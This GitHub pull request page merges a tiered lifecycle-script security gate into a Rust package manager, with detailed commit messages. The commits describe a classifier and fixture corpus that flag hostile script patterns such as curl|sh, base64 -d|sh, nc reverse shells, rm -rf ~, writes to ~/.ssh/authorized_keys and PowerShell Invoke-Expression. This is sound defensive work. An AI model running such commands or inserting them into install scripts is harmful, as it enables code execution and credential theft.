Skip to content

Phase 46.0 — tiered script-policy gate (v0.23.0 released)#7

Merged
tolgaergin merged 61 commits into
mainfrom
phase-46
Apr 23, 2026
Merged

Phase 46.0 — tiered script-policy gate (v0.23.0 released)#7
tolgaergin merged 61 commits into
mainfrom
phase-46

Conversation

@tolgaergin
Copy link
Copy Markdown
Contributor

Summary

Merges phase-46 onto main, documenting the v0.23.0 release cut
on 2026-04-23.

main was held pristine during the entire phase-46 development
window (54 feature commits) so this merge is a clean fast-forward
with the full code change in a single PR, plus three tag-cut-day
commits (bench harness fix, perf fix, bench baseline).

Tag v0.23.0 was cut on phase-46 @ cb01216 before this PR was
opened, and the Release workflow has already completed green:
binaries published to npm + Homebrew formula updated + wrapper
package refreshed. This PR is merge-only — not release-in-flight.

What's in 46.0

Ships the four-layer tiered lifecycle-script gate
(§4 of the plan doc):

  • P1 schema + loader + --policy=deny|allow|triage + trust
    snapshot
  • P2 static-gate classifier (≥500-entry corpus, ≥60% green,
    zero false-positive reds)
  • P3 cooldown (--min-release-age + minimumReleaseAge)
  • P4 provenance-drift gate (Sigstore attestation identity
    check) + --ignore-provenance-drift[-all] overrides
  • P5 filesystem-scoped sandbox (macOS Seatbelt)
  • P6 tier-aware auto-build (hard-gated on P5)
  • P7 version-diff UI (script-hash drift + behavioral-tag
    delta render)

P8 (LLM triage) deferred to Phase 46.1. Hard preconditions
P5 + P6 ship here.

Tag-cut validation (§18)

Gate Target Result
§18 red-count on Next.js 16.2.4 0 0
§12.7 Axis 1 (classification, autoBuild off) ≤5% vs deny −15% (noise-dominant) ✅
§12.7 Axis 2 (control-path, autoBuild on) ≤5% vs deny +3% ✅
§13.1 A/B main vs phase-46 under deny (277-pkg) ~0% +7.8% (noise floor)

Full validation doc:
a-package-manager/DOCS/new-features/37-rust-client-phase46-nextjs-validation.md
(filled in on the companion branch, pushed separately to
tolgaergin/a-package-manager#phase-46-p4-server-side).

Full bench baseline:
bench/baselines/2026-04-23-46.0-macos-arm64.md.

Tag-cut day commits (this week)

  • ed001fa — bench harness honors BENCH_WORK_DIR +
    BENCH_PROJECT_DIR env overrides so cold-install-clean
    doesn't trigger VS Code --no-ignore rg storms on the
    workspace
  • f19d23einstall.rs > build_blocked_set_metadata fanout
    via futures::future::join_all — serial per-package awaits
    cost ~770 ms on a 277-pkg tree, parallel cost ~200 ms
    (noise-floor deny-mode delta)
  • 4607f4f — macOS arm64 bench baseline for the 46.0 tag cut
  • cb01216 — version bump to 0.23.0

Scope boundary (§17)

Project installs only. Global-install support for the tiered
gate ships in Phase 46.1 alongside LLM triage (P8).

Test plan

  • Local CI gate green: cargo clippy --workspace --all-targets -- -D warnings, cargo fmt --check, fancy-regex guard, cargo build --workspace, cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast — 4217/4217, cargo test -p lpm-auth × 3 — 47/47 each
  • §18 Next.js red-count validation captured on 2026-04-22 23:55
  • §12.7 cold-install-triage axes captured on 2026-04-22 23:45
  • §13.1 A/B cross-binary post-fix captured on 2026-04-23 ~10:00
  • Release workflow v0.23.0 green (npm + Homebrew + wrapper published)
  • CI on this PR green (it runs on PR open)

🤖 Generated with Claude Code

tolgaergin and others added 30 commits April 20, 2026 23:40
…, BlockedPackage fields

Adds the persisted-schema primitives for Phase 46's tiered triage gate
(plan §6). No BUILD_STATE_VERSION bump: additions are Option<T> with
serde defaults, so pre-46 and Phase-46 readers are mutually compatible.

New types in lpm-security:
- StaticTier enum (green | amber | amber-llm | red), kebab-case wire
- ProvenanceSnapshot { present, publisher, workflow, cert_sha256 }

BlockedPackage extensions (ownership per §11 field-ownership rule):
- static_tier — populated by P2 static classifier
- provenance_at_capture — populated by P4 provenance drift
- published_at — populated by P1 metadata plumbing
- behavioral_tags_hash — populated by P1 metadata plumbing

Reader check relaxed !=-> `>` so future minor additions don't
invalidate existing .lpm/build-state.json. Bump policy documented on
BUILD_STATE_VERSION: only breaking changes warrant a bump.

Tests:
- StaticTier kebab-case serialization, round-trip, rejection of
  camelCase + unknown variants
- ProvenanceSnapshot full + absent + partial parse + strict equality
- BlockedPackage mutual-compat both directions (v1 reader on
  Phase-46-written file; Phase-46 reader on v1-written file)
- Reader rejects state_version > BUILD_STATE_VERSION; accepts equal

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
3713/3714 tests pass (1 unrelated perf-threshold flake in lpm-task
filter::eval, different test each retry — load sensitivity, not a
regression).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ge flags

Adds the second P1 chunk: consolidated script-config loader, the new
policy-mode enum, and the CLI flag surface (plan §5.4 + D22). No
execution-semantics change yet — P1 only plumbs the resolved policy
through; tier-aware execution lands in P6 after the sandbox (D20).

New module: crates/lpm-cli/src/script_policy_config.rs
- ScriptPolicy enum (Deny | Allow | Triage), kebab-case wire, serde
  default = Deny
- ScriptPolicyConfig { policy, auto_build, deny_all, trusted_scopes }
  — one package.json pass for all four script-related keys
- collapse_policy_flags(): combines --policy / --yolo / --triage into
  a single Option<ScriptPolicy>, trusting clap's conflicts_with_all
  for the mutual-exclusion invariant
- resolve_script_policy(): full precedence chain
  CLI > package.json > ~/.lpm/config.toml > default (deny)

CLI surface on both `lpm install` and `lpm build`:
- --policy=deny|allow|triage (canonical)
- --yolo (alias for --policy=allow)
- --triage (alias for --policy=triage)
Mutual-exclusion enforced at clap layer via conflicts_with_all;
invalid --policy values produce an actionable error naming the value
and the accepted list.

Consolidation: deleted the two ad-hoc script-config readers:
- read_auto_build_config (install.rs:5480) → ScriptPolicyConfig.auto_build
- read_deny_all_config  (build.rs:838)    → ScriptPolicyConfig.deny_all
Their dedicated tests are removed; equivalent coverage lives in
script_policy_config::tests (15 tests: kebab parsing, all-four-keys
load, explicit-deny-vs-unset distinction, malformed JSON, invalid
value silent fallthrough, full precedence chain).

Verified end-to-end:
- `lpm install --help` renders all three flags with precedence doc
- `lpm install --yolo --triage` → clean clap conflict error
- `lpm install --policy=garbage` → actionable message with valid list

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1695/1695 tests pass on touched crates (lpm-security + lpm-cli). The
lpm-task filter::eval perf-threshold tests flake under parallel load
across the whole workspace; isolated serial re-run passes 168/168,
confirming load sensitivity rather than a regression.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…criptPolicy typos

Addresses two Medium findings from the third-round audit of the P1
CLI-surface commit (a15cbd3):

Finding 1 — Help text promised behavior that doesn't exist yet.
Previous copy on --policy / --yolo / --triage described execution
semantics ("run every script without gating", "greens auto-approve in
sandbox") that land in a later phase; today these flags are accepted,
resolved, and logged only. Users running `lpm install --yolo` today
would reasonably expect scripts to run and be confused when nothing
changed. Rewrote help copy on both install and build to open with
"Status in this build (Phase 46 P1): flag accepted and logged; does
NOT change execution behavior yet" and follow with what each value
*will* do. Lets CI / scripts opt in to future behavior now without
misleading the current UX.

Finding 2 — Invalid package.json > lpm > scriptPolicy silently
ignored. Previous behavior: a typo in a team-shared manifest fell
through to each developer's ~/.lpm/config.toml or the default, silently
producing per-developer policy divergence. This is the wrong failure
mode for shared config.

ScriptPolicyConfig now carries `policy_parse_error: Option<String>`:
when `scriptPolicy` is present as a string but doesn't parse, this
field holds the offending input (loader still returns `policy: None`
so precedence falls through to global / default — the resolver's
contract is unchanged). Install + build handlers check the field and
emit `output::warn` with the value and accepted list when not in JSON
mode, so a typo is user-visible on every install.

Tested live: `package.json` with `"scriptPolicy": "invalid-typo"`
produces:
  ▲  package.json > lpm > scriptPolicy: invalid value 'invalid-typo'
     (expected one of: deny, allow, triage); falling back to user
     config / default

Architecture refactor: resolve_script_policy(cli, &Path) →
resolve_script_policy(cli, &ScriptPolicyConfig). Callers now load the
config once at handler entry, inspect policy_parse_error, then pass
the loaded config to the resolver. De-duplicates the two loader calls
per invocation and keeps warning-emission a caller concern (loader
has no knowledge of JSON mode or color output).

Tests:
- Renamed from_package_json_invalid_script_policy_is_silent_none →
  ..._surfaces_parse_error; asserts both policy==None AND
  policy_parse_error==Some(input)
- New from_package_json_valid_script_policy_has_no_parse_error
- New from_package_json_absent_script_policy_has_no_parse_error
- New resolve_ignores_parse_error_uses_fallthrough pins the resolver
  contract: parse-error does not block resolution
- Existing resolve_* tests updated for new signature

Finding 3 (helpers still use lenient name-only gate) is addressed in
the next planned P1 chunk (helper migration) per the field-ownership
discipline in the plan's §11 P1 scope.

Full-workspace CI gate: clippy -D warnings clean, fmt clean, 18/18
script_policy_config tests pass. lpm-task filter::eval perf-threshold
flakes under parallel load continue to be unrelated to these crates.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ve policy

Addresses the Low-severity wording drift from the fourth-round audit:
the scriptPolicy typo warning was emitted BEFORE resolution and always
said the value was "falling back to user config / default". That is
only true when no CLI override is present. When the user passes
--policy, --yolo, or --triage, the CLI override is what actually
wins — so the warning's tail was misleading in that case.

Fix: move warning emission to AFTER `resolve_script_policy` and
include the resolved value in the message. One message works
across all three precedence paths:

  no CLI override → "…effective policy: deny"   (or global, if set)
  --yolo          → "…effective policy: allow"
  --policy=triage → "…effective policy: triage"

Ordering is preserved: invalid CLI flag values (e.g. --policy=garbage)
still error out via `collapse_policy_flags` BEFORE we'd emit the
package.json warning, so the CLI error takes precedence over the
manifest warning as before.

Tested live:
  ▲  package.json > lpm > scriptPolicy: invalid value 'invalid-typo'
     (expected one of: deny, allow, triage); this key was ignored —
     effective policy: <deny|allow|triage>

Workspace gate clean: clippy -D warnings, fmt, 1698/1698 tests pass
on touched crates.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…cripted_packages_trusted use strict gate

Closes audit Finding 3 (third-round review). Pre-existing drift:
`build::run` uses `can_run_scripts_strict` (binds to
{name, version, integrity, script_hash}), but both the install-time
hint and the auto-build "all trusted" predicate used the lenient
`policy.can_run_scripts(name)` gate. Consequence: a drifted rich
binding was shown as `trusted ✓` in the install hint AND satisfied
the auto-build predicate, even though `build::run` would then skip
it — confusing UX at best, silent trust-drift bypass at worst.

Both helpers now use the same four-way TrustMatch handling as
`build::run` at build.rs:133:
  - Strict         → trusted
  - LegacyNameOnly → trusted (build::run still runs with deprecation)
  - BindingDrift   → NOT trusted (behavior fix)
  - NotTrusted     → NOT trusted
OR-composed with is_scope_trusted, matching build::run exactly.

Signature change: both helpers' `packages` argument is now
`&[(String, String, Option<String>)]` (name, version, integrity).
Three call sites in install.rs updated to thread integrity through
(it's already on the existing InstallPackage struct — one field, no
data-flow refactor needed).

Extracted `scriptable_package_rows()` as a pure helper that
`show_install_build_hint()` now wraps; the pure helper is the test
surface for reviewer-prescribed regression case A.

Tests (reviewer prescription + positive control):
  A. show_install_hint_drifted_rich_binding_is_not_trusted — drifted
     rich binding MUST NOT be shown as `trusted ✓`. Pre-migration
     this asserted true against `is_trusted`; now asserts false.
  B. all_scripted_packages_trusted_false_on_drifted_rich_binding —
     drifted rich binding MUST NOT satisfy the auto-build predicate.
     Pre-migration: true; now false.
  Positive control: scriptable_rows_strict_match_is_trusted — a rich
     binding whose scriptHash matches the on-disk hash IS trusted.
     Proves the drift tests distinguish "drifted" from "no binding."

Three existing helper tests updated to the new tuple signature
(integrity: None preserves their semantics since they use legacy
bare-name `trustedDependencies` arrays, which parse as LegacyNameOnly
— treated as trusted by both old and new gates).

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1701/1701 tests pass on touched crates (lpm-cli + lpm-security). The
lpm-task filter::eval perf-threshold tests continue to flake under
parallel load; serial re-run 168/168 confirms unrelated to this
migration.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…_hash populated on BlockedPackage

Closes the first of the three remaining P1 chunks. The Phase 46 schema
added optional `published_at` and `behavioral_tags_hash` fields to
BlockedPackage (commit 474fc59) but left them always-None; this commit
wires the producer that populates them from registry metadata.

New machinery:
- lpm-registry: BehavioralTags::active_tag_names() returns the canonical
  camelCase names of the 22 tag-fields that are true, sorted
  lexicographically. Static strings mirror the serde renames and the
  server-side behavioral-tags.js schema so the hash is portable.
- lpm-security::triage: hash_behavioral_tag_set(&[&str]) produces a
  deterministic "sha256-<hex>" digest with NUL separators (adjacency-
  collision defense). Empty input hashes to a stable, non-empty value
  (SHA-256 of empty string); callers distinguish "no active tags" from
  "no metadata" at the call site.
- build_state: BlockedSetMetadata + BlockedSetMetadataEntry types
  (keyed by (name, version)). New entry points
  compute_blocked_packages_with_metadata and
  capture_blocked_set_after_install_with_metadata consume the map.
  Existing signatures preserved as thin wrappers passing an empty
  metadata map — zero test churn across the ~30 callers that use them.

Install pipeline (install.rs):
- build_blocked_set_metadata() async helper iterates packages and
  fetches registry metadata via the existing TTL-cached client API.
  Extracts time[version] → published_at and versions[version]
  ._behavioralTags → hash_behavioral_tag_set. Returns empty map on
  errors (graceful degradation; must never fail install).
- Primary install path calls the _with_metadata variant with the
  built map. Fast-path (run_link_and_finish) still uses the no-
  metadata wrapper — fields stay None there, which is documented
  degradation (the lockfile fast-path has no populated TTL cache).

Tests (5 new in build_state::tests):
- compute_with_metadata_forwards_published_at_and_behavioral_tags_hash
- compute_with_metadata_missing_entry_leaves_fields_none (graceful)
- compute_with_metadata_partial_entry_forwards_only_populated_half
- backward_compat_wrapper_captures_with_empty_metadata
- metadata_fingerprint_is_independent_of_metadata (design invariant:
  the blocked-set fingerprint is over blockable packages + their
  strict binding only, NOT over their metadata — registry churn
  must not re-fire the blocked-set suppression banner)

Plus 6 new tests in lpm-security::triage::tests covering the hashing
helper: sha256- prefix + fixed length, empty-input pinned digest,
order sensitivity (caller contract), NUL-separator adjacency defense,
determinism, subset-distinction.

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1821/1821 tests pass on touched crates. Field ownership matches the
Phase 46 plan §11 P1 table: published_at + behavioral_tags_hash
are P1-owned; static_tier + provenance_at_capture remain None until
P2 and P4.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Closes the second of the three remaining P1 chunks. Implements plan
§4.2: detect silent additions to `package.json > lpm >
trustedDependencies` between installs. Motivating case: a "bump dep"
PR that quietly grows the trust list gets flagged locally instead of
slipping past code review.

New module: crates/lpm-cli/src/trust_snapshot.rs
- TrustSnapshot { schema_version, captured_at, bindings } persisted
  to `<project_dir>/.lpm/trust-snapshot.json`. BTreeMap-keyed for
  deterministic on-disk ordering.
- SnapshotEntry { integrity, script_hash } — minimal 2-field
  projection of TrustedDependencyBinding. Does NOT capture Phase 46
  audit fields (approved_by, approved_by_model_exact) — those belong
  to the manifest's audit trail, not the "did-the-set-change" diff.
- TrustSnapshot::capture_current pattern-matches the Legacy / Rich
  variants directly rather than calling TrustedDependencies::iter
  (which normalizes keys to the name-portion only and would collapse
  per-version granularity).
- TrustSnapshot::diff_additions — keys in current not in previous,
  sorted. Returns empty on "no previous" (first install). Deliberately
  ignores removals (not a security concern) and same-key binding
  changes (already handled by BindingDrift in the install path).
- Schema-versioned parallel to BuildState: SCHEMA_VERSION = 1; same
  no-version-bump policy for additive field changes.
- format_new_bindings_notice produces the user-facing multi-line
  notice pointing at `lpm trust diff` (the inspection CTA — ships
  in chunk C).
- write_snapshot is atomic (temp-then-rename); crash safety matches
  build-state.json.

Install pipeline (install.rs):
- Pre-install: after "Installing dependencies for X" and before the
  lockfile fast-path branch, read prior snapshot, diff against
  current manifest, emit notice via output::info. Suppressed in
  --json mode (no stable JSON schema yet; agents get the same data
  from `lpm trust diff` in chunk C).
- Post-install: snapshot write on BOTH the main path and the
  run_link_and_finish fast path. The fast path is reached when only
  trustedDependencies changed (lockfile still valid) so skipping
  snapshot write there would leave the next install diffing against
  stale state. Write failures are tracing::warn only — non-fatal,
  graceful degradation.

Tests (16 in trust_snapshot::tests):
- capture_current: empty, rich bindings, legacy bare-name keying
- diff_additions: no previous, additions detected, removals ignored,
  binding-changes ignored, multi-addition sort invariant
- format_new_bindings_notice: empty → None, populated → CTA present
- read/write: round-trip, missing file, malformed JSON, newer
  schema_version refused, atomic-write leaves no .tmp file
- End-to-end regression (audit prescription A):
  install_n_writes_snapshot_install_n_plus_1_detects_addition —
  simulates the full flow from snapshot-write through diff on the
  next install; asserts both the additions list and the rendered
  notice include the poisoned-PR addition.

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1837/1837 tests pass on touched crates. Field ownership: P1 owns
.lpm/trust-snapshot.json per plan §11 — done here.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…complete

Closes the final P1 chunk. Adds the user-facing surface over the
trust-snapshot persistence machinery (8c03c55) — inspection via
`lpm trust diff`, active cleanup via `lpm trust prune`.

New module: crates/lpm-cli/src/commands/trust.rs
- TrustCmd clap subcommand enum with Diff and Prune variants.
- compute_full_diff returns added / removed / changed entries across
  the snapshot → current manifest transition, ordered
  added-then-removed-then-changed with stable lexicographic sort
  within each class (matches the rendering convention).
- compute_stale_keys extracts the NAME portion from Rich keys
  (`name@version`) via `rfind('@')` so scoped packages like
  `@myorg/pkg@1.0.0` resolve to `@myorg/pkg` correctly. Version
  drift (same name, different version) is NOT flagged as stale —
  that's BindingDrift territory.
- remove_stale_from_manifest handles both Legacy (filter array in
  place) and Rich (remove map keys) shapes of trustedDependencies.
- Atomic manifest writer (temp-then-rename) mirrors the snapshot
  writer's crash-safety pattern.
- Stable JSON schema on `--json` with SCHEMA_VERSION = 1 per P9
  telemetry discipline.

`lpm trust diff`:
- `--json` emits structured { added, removed, changed } arrays plus
  the snapshot's `captured_at` for agent consumption.
- Human mode renders `+ added`, `- removed`, `~ changed` with
  per-field delta ("integrity: sha512-old → sha512-new") for changed
  entries.
- Empty diff reports "unchanged since last install (<timestamp>)".

`lpm trust prune`:
- Reads lpm.lock to determine installed names; refuses to run if
  lockfile is missing.
- `--dry-run` to preview; `--yes` for non-TTY; non-TTY without
  `--yes` is a hard error (prevents silent mutation in CI).
- `--json` emits `{ stale_count, stale[], dry_run, mutated }`.
- Confirmation prompt on TTY via cliclack.

main.rs:
- New `Trust { action: TrustCmd }` variant with inline subcommand
  dispatch following the `Global { action: GlobalCmd }` pattern
  already established in the codebase.

Tests (13 in commands::trust::tests):
- compute_full_diff: empty, added/removed/changed classification +
  ordering invariant, identical → empty
- compute_stale_keys: rich entries by name (strips @Version),
  scoped package name extraction (last-@ rule), legacy bare names,
  empty manifest, version-drift-is-not-stale regression
- remove_stale_from_manifest: rich map, legacy array, nonexistent
  key is no-op
- write_manifest atomic-write-no-tmp-leak
- End-to-end prune_removes_stale_entry_and_leaves_active_entry_intact
  (audit prescription B): real package.json + fake lockfile, invoke
  run_prune via tokio runtime, assert file contents post-mutation.

Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1850/1850 tests pass on touched crates (lpm-cli + lpm-security +
lpm-registry).

Phase 46 P1 IS COMPLETE. Branch phase-46 has 8 commits covering:
- Schema extensions (474fc59)
- ScriptPolicyConfig + --policy/--yolo/--triage flags (a15cbd3)
- Audit honesty fixes: help text + scriptPolicy typo warning (403a041)
- Audit v3: warning names effective policy (665e74b)
- Helper migration: strict gate in show_install_build_hint +
  all_scripted_packages_trusted (107fde5)
- Metadata plumbing: published_at + behavioral_tags_hash (f13541c)
- Trust-snapshot persistence + diff notice (8c03c55)
- lpm trust diff + lpm trust prune (this commit)

Next phase: P2 static classifier. All P1 field-ownership obligations
met per plan §11:
  - Schema extensions (done)
  - Helper migration (done)
  - Config consolidation (ScriptPolicyConfig done)
  - Metadata plumbing (published_at, behavioral_tags_hash done)
  - Trust-snapshot persistence (done)
  - lpm trust diff/prune (done)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… + error on malformed TD

Closes two Low findings from the end-of-P1 audit:

F1 — `lpm trust prune --json` emitted the structured output BEFORE
the write, with an optimistic `mutated: true` that the subsequent
non-TTY/confirmation guard could invalidate by erroring out. The JSON
contract was unreliable for automation.

Fix: restructure `run_prune` so at most ONE terminal output is emitted
per invocation, always post-mutation (or post-decision-not-to-mutate):
  - empty stale → mutated: false, no write
  - dry-run → mutated: false, no write
  - non-TTY + !yes → Err before any output
  - write_manifest fails → Err propagates, no JSON emitted
  - success → mutated: true, emitted AFTER write_manifest returns Ok

`mutated` is now an accurate post-condition, not a prediction.

F2 — `extract_trusted_dependencies` used `unwrap_or_default()`, so a
manifest with a malformed `lpm.trustedDependencies` value (typo, wrong
shape, etc.) silently degraded to "empty set" — prune then reported
"nothing to prune" and exited 0. The typed read path used by `trust
diff` (via `lpm_workspace::read_package_json`) already errors on this;
`trust prune` now matches that strictness.

Fix: `extract_trusted_dependencies` returns Result<TrustedDependencies,
LpmError>; propagates via `?` in run_prune. Error message names the
offending key and the accepted forms (legacy array vs. Phase-4 rich
map). Absent key path unchanged — still Ok(default).

Tests (7 new in commands::trust::tests, bringing trust to 20/20):

Unit:
- extract_trusted_dependencies_absent_key_is_ok_default
- extract_trusted_dependencies_valid_legacy_array_parses
- extract_trusted_dependencies_valid_rich_map_parses
- extract_trusted_dependencies_malformed_shape_errors (4 bad shapes
  exercised: number, string, bool, array-of-non-strings)

End-to-end (filesystem-observable post-conditions — no stdout capture
required, because file state on disk is the authoritative proof that
the JSON emission matches reality):
- run_prune_empty_stale_does_not_mutate_manifest — byte-identical
  pre/post, proves no spurious write when nothing is stale
- run_prune_dry_run_does_not_mutate_manifest — same, with a real
  stale entry present and --dry-run honored
- run_prune_malformed_trusted_deps_errors_before_any_write — F2
  end-to-end: bad shape surfaces as LpmError + file unchanged

Full-workspace CI gate: clippy -D warnings clean, fmt clean, 20/20
trust tests pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
New pure, deterministic classifier for lifecycle-script bodies.
Emits Green | Amber | Red only; AmberLlm is reserved for P8.

Classification semantics (P2 = classification-only per D20):
- Green: exact match of curated allowlist (node-gyp rebuild, tsc
  [-b|-p path], prisma generate, husky [install], electron-rebuild,
  node <safe-relative>.{js,cjs,mjs} where basename is NOT install.js
  / postinstall.js).
- Red: hand-curated blocklist — pipe-to-shell (curl|sh, wget|bash,
  base64 -d|sh), node -e / --eval, iex / nc / netcat / ncat / eval,
  nested package managers (npm/pnpm/yarn/bun/lpm/pip/gem/cargo/brew
  install), rm -rf on ~/$HOME/absolute paths, chmod +x/777 outside
  package, redirects into ~/.bashrc / ~/.ssh/** / /etc/** /root/**,
  PowerShell literals (Invoke-Expression, FromBase64String,
  Add-MpPreference), Unicode control chars (Trojan Source class).
- Amber: everything else, including compound commands AND network
  binary downloaders (playwright install, puppeteer, cypress install,
  electron-builder install-app-deps) per D18.

Pipeline ordering (per §4.1 with the review-round refinement):
  1. Raw-string red prefilter (Unicode + PowerShell literals)
  2. Quote-aware operator normalization (see below)
  3. shlex tokenization (parse failure → Amber)
  4. Tokenized red checks (MUST precede compound fallback so
     curl … | sh → Red, not Amber)
  5. Compound-operator detection (any &&, ||, ;, |, >, >>, <, <<, &,
     ( ), $(, backtick) → Amber
  6. Green allowlist match
  7. Fallback → Amber

Quote-aware operator normalizer fixes a review-round finding: shlex
splits on whitespace but does NOT recognize shell operators, so
`curl url|sh` tokenized as ["curl", "url|sh"] and silently
downclassified to Amber via the compound fallback. The normalizer
pads every UNQUOTED operator with surrounding whitespace before
shlex sees the string, tracks single-quote / double-quote /
backslash-escape state, and recognizes the four two-char operators
(&&, ||, >>, <<) as atomic units.

Contract: no execution semantics change. P2 populates static_tier
on BlockedPackage for UX annotation only; auto-execution of greens
is gated on P5 (sandbox) + P6 (tier-aware auto-run).

Ship:
- Adds shlex = "1.3" to workspace deps.
- 58 unit tests in static_gate::tests, including 7 regression tests
  for the no-space operator finding (curl|sh, base64 -d|sh,
  echo hi>~/.bashrc, tsc&&husky install, and three negative cases
  covering quoted / escaped operator characters).

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings          ✓
- cargo fmt --check                                  ✓
- grep -r 'fancy-regex' crates/*/Cargo.toml          ✓ (empty)
- cargo build --workspace                            ✓
- cargo nextest run --workspace --exclude           ✓ (3834 pass;
  lpm-integration-tests                                 known flake
                                                        lpm-task perf_eval_glob
                                                        passes serially)
- cargo nextest run -p lpm-security                  ✓ (387/387)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Clippy's let_and_return fires on `manager_with` under
`cargo clippy --all-targets` (not on the CI gate, which runs
`--workspace` only, so this has been silently red for anyone who
flips on --all-targets locally). One-line fix: return the struct
literal directly.

Surfaced while running the pre-merge CI gate for phase-46 P2
chunk 1 at --all-targets. Unblocks the lpm-auth clippy run; the
remaining --all-targets errors live in lpm-cli test code
(build_state.rs bool-literal assert_eq, trust.rs / trust_snapshot.rs
needless struct update) and are out of scope here.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…harness

Ships the starter fixture corpus (91 scripts across 14 categories)
plus a one-test integration harness that classifies every entry
against its declared expectation.

Layout:
  crates/lpm-security/tests/fixtures/postinstall-scripts/
    ├── README.md                  — naming / ship-criteria doc
    ├── expectations.json          — [{id, expected, notes?}]
    └── scripts/<id>.txt           — one raw body per entry

Corpus composition (deliberately biased toward amber/red coverage;
Chunk 6 grows toward 500 real-world postinstalls):
  green-*              (20) — allowlist hits (tsc, node-gyp rebuild,
                              prisma generate, husky[install],
                              electron-rebuild, node <relative>.{js,cjs,mjs})
  amber-d18-*          (10) — D18 network binary downloaders
                              (playwright, puppeteer, cypress,
                              electron-builder, node install.js)
  amber-compound-*     ( 8) — compounds of otherwise-green commands
  amber-novel-*        (12) — out-of-allowlist commands (python,
                              make, cmake, gulp, npx, yarn build…)
  amber-node-escape-*  ( 5) — node with escaping paths (../, /abs,
                              ~/, $HOME, no-ext)
  amber-parse-fail-*   ( 1) — unbalanced quote → shlex fails closed
  red-pipe-*           ( 5) — curl|sh / wget|bash / base64 -d|sh
  red-eval-*           ( 3) — eval, node -e, node --eval
  red-nested-pm-*      ( 8) — npm/pnpm/yarn/bun/pip/cargo/gem/brew
                              install
  red-rm-*             ( 4) — rm -rf ~ / / $HOME / ~/.ssh
  red-chmod-*          ( 2) — chmod outside package tree
  red-redirect-*       ( 3) — >> ~/.bashrc / ~/.ssh/authorized_keys
                              (including no-space regression)
  red-nc-*             ( 2) — nc / ncat reverse shell
  adversarial-*        ( 8) — §12.2 stress set: U+202E RTL override,
                              U+200D ZWJ, U+FEFF BOM,
                              Invoke-Expression, iex, FromBase64String,
                              Add-MpPreference, no-space pipe-bash

Harness (tests/static_gate_corpus.rs, one test, ~40ms):
- Loads manifest + each raw-body file, calls classify(), asserts
  declared expectation matches actual tier for every entry.
- Hard-fails on any false-positive red (§4.1 ship criterion).
- Hard-fails if the classifier ever emits AmberLlm (contract
  invariant: P2 owns Green|Amber|Red; AmberLlm is reserved for P8).
- Duplicate-id guard on manifest load.
- Prints per-run stats (total / green / amber / red + green-rate on
  the real-corpus subset) so tuning during Chunks 3–6 has continuous
  feedback. The ≥60% green-rate threshold is NOT asserted here —
  starter corpus is biased low by design (current: 35%); threshold
  flips to hard-gate in Chunk 6 once the corpus grows to 500.

Denominator for the ≥60% is pinned in the plan doc (§4.1 update in
a separate commit): green / (green + amber) over non-adversarial
entries, measured the same way the harness measures it today.

Unicode bytes verified on disk (xxd):
  adversarial-001: E2 80 AE (U+202E RTL OVERRIDE)
  adversarial-002: E2 80 8D (U+200D ZWJ)
  adversarial-003: EF BB BF (U+FEFF BOM)

CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings               ✓
- cargo fmt --check                                     ✓
- cargo build --workspace                               ✓
- cargo nextest run -p lpm-security                     ✓ (388/388)
- cargo nextest run --workspace                         ✓ (3834/3836;
  --exclude lpm-integration-tests                         2 failures are
                                                          the known lpm-task
                                                          perf_eval_* flake
                                                          under parallel load,
                                                          pass serially, not
                                                          in touched crates)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…-builds UI/JSON

Static-gate classification now runs at install-time blocked-set
capture and is persisted on every fresh BlockedPackage. Value
surfaces in both the human approve-builds card and the --json shape
so the existing review flow gains the P2 tier annotation
immediately.

lpm-security/triage.rs
- Adds StaticTier::worse_of — canonical worst-wins reducer
  (Red > AmberLlm > Amber > Green). Symmetric, idempotent, fits
  Iterator::reduce directly. 7 precedence tests.

lpm-cli/build_state.rs
- Replaces read_present_install_phases with
  read_install_phase_bodies — returns Vec<(phase_name, body)> in
  canonical EXECUTED_INSTALL_PHASES order. One read + parse of
  package.json feeds both phases_present derivation and the
  classifier; old helper had one caller and is deleted.
- compute_blocked_packages_with_metadata classifies each present
  phase body via lpm_security::static_gate::classify, folds
  worst-wins via StaticTier::worse_of, and writes the result to
  BlockedPackage.static_tier. Populated unconditionally per plan
  §5.1 (annotation works under deny/triage/allow). A freshly
  computed BlockedPackage always has Some(tier); None indicates
  persisted state predates P2.
- 8 new tests: read_install_phase_bodies order + empty-body skip +
  error paths; worst-wins population for Green, Red, Green+Red→Red,
  Green+Amber→Amber; always-Some invariant.

lpm-cli/commands/approve_builds.rs
- SCHEMA_VERSION: 1 → 2 (per plan §6.4). Version-history doc
  captures the v2 delta.
- blocked_to_json emits "static_tier": kebab-case string or null.
  null (not omitted) for v1 legacy state so agents can distinguish
  "no tier known" from "field missing" without re-checking
  schema_version per row.
- print_package_card renders `Static tier: <label>` with color
  (green→green, amber/amber-llm→yellow, red→red). Absent means the
  blocked state predates P2; no line is printed rather than
  showing "unknown".
- tier_label_text + colored_tier_label split — pure helper is
  unit-testable, color wrapper is separate. 8 new tests: schema
  bump, every tier→JSON mapping, null-when-absent, label
  distinctness, label prefix, colored-embeds-plain.

lpm-cli/tests/approve_builds_audit_regression.rs
- Two stdout-JSON contract tests pinned schema_version == 1;
  bumped to 2 with inline comment pointing at this change.

